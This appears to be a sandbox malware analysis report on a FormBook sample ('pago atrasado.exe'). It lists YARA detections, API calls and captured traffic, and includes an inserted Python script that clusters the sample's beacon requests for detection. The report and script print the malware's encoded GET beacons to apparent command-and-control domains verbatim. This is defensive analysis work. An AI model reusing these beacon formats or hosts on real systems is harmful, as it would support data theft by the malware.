          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/display.cfm
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/px.js?ch=1
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/px.js?ch=2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/sk-logabpstatus.php?a=MzZzaVd5UDZhY0hEU3Z1UzFXVHRjNXcrTjlwaWZWbWlYbHV5Y
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/song_lyrics.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FLdrtTp
          Source: unknown DNS traffic detected: queries for: www.highvizpeople.com
          Source: global traffic HTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1 Host: www.highvizpeople.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1 Host: www.oddanimalsink.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1 Host: www.itskosi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1 Host: www.crisisinterventionadvocates.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1 Host: www.everythangbutwhite.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
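          The five GET requests above share one template: the same short directory (/u9xn/), one parameter (z0) carrying a different blob each time, one constant trailing parameter (PjlT=JhfHclW8zdo) and a seven-byte all-NUL body on a GET, sent to five unrelated hosts. That fan-out of one request shape across many domains is the behaviour to key on, because most of those hosts are decoys and only one is the live C2. The following Python is an added example written for this page, not part of the Joe Sandbox report or its tooling. It rebuilds the five requests from the report as wire-format bytes (plus two ordinary requests invented for contrast), groups them by template and counts distinct hosts per template; the minimum fan-out of three hosts is an assumption, not a value from the report.

```python
"""Cluster HTTP requests from a sandbox report to expose FormBook-style C2 beaconing.

The beacon template is: a fixed path, a first parameter whose value changes per request
(the encrypted beacon), and a constant trailing parameter. Grouping requests by that
template and counting the distinct hosts it went to separates the C2 fan-out from
ordinary web traffic to the same hosts.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$")


def _raw(target, host, body=b""):
    """Build a wire-format GET the way the report shows it (helper for the constructed sample)."""
    head = f"GET {target} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    return head.encode("ascii") + body


# Constructed sample: the five beacons listed in the report, followed by two ordinary
# requests that are invented for contrast and do not appear in the report.
SAMPLE_REQUESTS = [
    _raw("/u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo",
         "www.highvizpeople.com", b"\x00" * 7),
    _raw("/u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo",
         "www.oddanimalsink.com", b"\x00" * 7),
    _raw("/u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo",
         "www.itskosi.com", b"\x00" * 7),
    _raw("/u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo",
         "www.crisisinterventionadvocates.com", b"\x00" * 7),
    _raw("/u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo",
         "www.everythangbutwhite.com", b"\x00" * 7),
    _raw("/px.js?ch=1", "www.highvizpeople.com"),
    _raw("/px.js?ch=2", "www.highvizpeople.com"),
]


def parse_request(raw):
    """Split one wire-format HTTP request into method, path, ordered query params, host and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if m is None:
        raise ValueError(f"not an HTTP request line: {lines[0]!r}")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(m["target"])
    # Split by hand rather than parse_qsl: the beacon blob is raw base64 and must keep its '+' and '/'.
    params = [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in parts.query.split("&") if p]
    return {"method": m["method"], "path": parts.path, "params": params,
            "host": headers.get("host", ""), "body": body}


def beacon_template(req):
    """Request shape with the variable first parameter value dropped; None if it cannot be a beacon."""
    if req["method"] != "GET" or len(req["params"]) < 2:
        return None
    (first_name, _), *rest = req["params"]
    return (req["path"], first_name, tuple(rest))


def find_beacon_clusters(reqs, min_hosts=3):
    """Map each request template to the distinct hosts it was sent to; keep fan-out >= min_hosts."""
    hosts_by_template = defaultdict(set)
    for r in reqs:
        t = beacon_template(r)
        if t is not None:
            hosts_by_template[t].add(r["host"])
    return {t: sorted(h) for t, h in hosts_by_template.items() if len(h) >= min_hosts}


def gets_with_nul_body(reqs):
    """GET requests carrying a body made only of NUL bytes (seven of them on every beacon in the report)."""
    return [r for r in reqs if r["method"] == "GET" and r["body"] and set(r["body"]) == {0}]


if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS]
    for (path, var_param, constants), hosts in find_beacon_clusters(parsed).items():
        print(f"{path} {var_param}=<varies> {dict(constants)} -> {len(hosts)} hosts: {', '.join(hosts)}")
    print(len(gets_with_nul_body(parsed)), "GET requests with an all-NUL body")
```

          The px.js requests to www.highvizpeople.com never join the cluster because they have a single parameter, so a decoy host that also serves ordinary content does not poison the verdict; the same grouping works on proxy logs as long as the full query string is retained.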

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: pago atrasado.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004047D3
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004061D4
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10008826
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10003D10
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100110D1
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000F8F2
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001199C
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100059A1
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A9E5
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A9F4
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000B22E
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000FE64
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10005E95
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100062AD
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100066E2
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10006B17
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000F380
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041D0F5
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041C0FC
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041B8B6
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041C985
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041C3AF
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00408C6B
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00408C70
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041BD45
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041A6B6
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A920A8
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DB090
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A928EC
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81002
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CF900
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A922AE
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FEBB0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8DBD2
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A92B28
